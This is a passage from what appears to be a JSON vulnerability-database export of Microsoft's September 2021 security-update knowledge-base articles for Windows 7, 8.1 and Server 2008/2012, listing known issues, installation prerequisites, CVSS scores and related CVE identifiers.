{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. 
\n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code signing signature.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. 
For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. 
The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006715](<https://support.microsoft.com/help/5006715>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007246](<https://support.microsoft.com/help/5007246>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different time zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006715](<https://support.microsoft.com/help/5006715>). 
If after installing [KB5006715](<https://support.microsoft.com/help/5006715>) you still receive the prompt every time you print, see Q1 in the \"Frequently asked questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. 
The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005618>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005618](<https://download.microsoft.com/download/6/f/0/6f091713-20f2-44a1-b92f-1b97061a9ac9/5005618.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005618 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005618", "href": "https://support.microsoft.com/en-us/help/5005618", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. 
\n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code signing signature.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. 
For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. 
The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006728](<https://support.microsoft.com/help/5006728>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007233](<https://support.microsoft.com/help/5007233>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different time zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006728](<https://support.microsoft.com/help/5006728>). 
If after installing [KB5006728](<https://support.microsoft.com/help/5006728>) you still receive the prompt every time you print, see Q1 in the \"Frequently asked questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. 
If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005615>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005615](<https://download.microsoft.com/download/9/0/1/9011f90e-86fb-404d-9847-0c430ac902ff/5005615.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005615 (Security-only update)", 
"bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005615", "href": "https://support.microsoft.com/en-us/help/5005615", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). 
To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005076](<https://support.microsoft.com/help/5005076>) (released August 10, 2021) and addresses the following issues:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. 
As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006714](<https://support.microsoft.com/help/5006714>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007247](<https://support.microsoft.com/help/5007247>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. 
The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006714](<https://support.microsoft.com/help/5006714>). If after installing [KB5006714](<https://support.microsoft.com/help/5006714>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005613>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005613](<https://download.microsoft.com/download/f/5/d/f5d43c2c-eb5e-48d1-961f-367730a68333/5005613.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005613 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005613", "href": "https://support.microsoft.com/en-us/help/5005613", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:35", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and 
fixes, any known issues, and how to get the update. \n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005088](<https://support.microsoft.com/help/5005088>) (released August 10, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. 
Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. 
When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006743](<https://support.microsoft.com/help/5006743>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007236](<https://support.microsoft.com/help/5007236>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. 
**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006743](<https://support.microsoft.com/help/5006743>). If after installing [KB5006743](<https://support.microsoft.com/help/5006743>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). 
To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
